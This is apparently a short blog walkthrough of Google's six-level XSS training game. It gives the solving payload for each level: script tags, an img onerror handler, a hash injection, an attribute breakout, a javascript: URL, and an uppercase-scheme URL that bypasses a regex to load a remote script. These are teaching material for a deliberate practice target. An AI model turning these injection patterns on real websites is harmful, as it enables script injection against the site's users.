Google has created 6 level interactive XSS game. Click here to start playing
If you can pass all the challenges, you will be rewarded with an appealing cake!
In this level you will learn what happens to the application if you use input from user directly without proper escaping.
<script>alert("Level1");</script>
Similar to level 1. But this time directly inserting <script>
tag will not work.
<img src="demo" onerror='javascript:alert("Level2");' />
There is no input field in thie level. But still Cross Site Scripting is possible via the address path as the JavaScript code directly uses self.location.hash.substr(1)
. It is the url part after the #
sign.
Simply inject the following:
https://xss-game.appspot.com/level3/frame#'onerror='alert("Level3")'
The code passes user value directly to onload="startTimer('{{ timer }}');"
method. Thus we can exploit the script.
Add the following part in the input field.
');javascript:alert('Level4
This is the most tricky challenge. Here some templates are connected in chain by storing the next
URL in a variable. So, if we can somehow change the value of next
variable then XSS will work.
So we simply change the URL to:
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('Level5')
Press GO which will change the URL of Next button to javascript:alert('Level5').
Finally press the Next button.
Do you know regular expression
? If the answer is yes
what do you think the following code snipper will do?
url.match(/^https?:\/\//)
Yeah! You are right. It will return true if url
variable starts with http. What happen if
urlstarts with
HTTP`?
If you do not know regex
, start learning from
Learn Regular Expressions with simple, interactive exercises
https://xss-game.appspot.com/level6/frame#HTTPS://arsho.github.io/rough/alert.js
Author: Ahmedur Rahman Shovon